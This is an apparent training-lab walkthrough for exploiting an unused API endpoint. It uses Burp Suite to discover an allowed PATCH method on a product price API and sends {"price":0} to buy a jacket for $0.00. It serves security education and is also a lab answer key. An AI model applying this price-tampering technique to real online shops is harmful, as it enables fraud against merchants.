Lab: Finding and exploiting an unused API endpoint

1. In Burp's browser, access the lab and click on a product.

2. In Proxy > HTTP history, notice the API request for the product. For example, /api/products/3/price.

3. Right-click the API request and select Send to Repeater.

4. In the Repeater tab, change the HTTP method for the API request from GET to OPTIONS, then send the request. Notice that the response specifies that the GET and PATCH methods are allowed.

5. Change the method for the API request from GET to PATCH, then send the request. Notice that you receive an Unauthorized message. This may indicate that you need to be authenticated to update the order.

6. In Burp's browser, log in to the application using the credentials wiener:peter.

7. Click on the Lightweight "l33t" Leather Jacket product.

8. In Proxy > HTTP history, right-click the API/products/1/price request for the leather jacket and select Send to Repeater.

9. In the Repeater tab, change the method for the API request from GET to PATCH, then send the request. Notice that this causes an error due to an incorrect Content-Type. The error message specifies that the Content-Type should be application/json.

10. Add a Content-Type header and set the value to application/json.

11. Add an empty JSON object {} as the request body, then send the request. Notice that this causes an error due to the request body missing a price parameter.

12. Add a price parameter with a value of 0 to the JSON object {"price":0}. Send the request.

13. In Burp's browser, reload the leather jacket product page. Notice that the price of the leather jacket is now $0.00.

14. Add the leather jacket to your basket.

15. Go to your basket and click Place order to solve the lab.

Intigriti

Popo Hack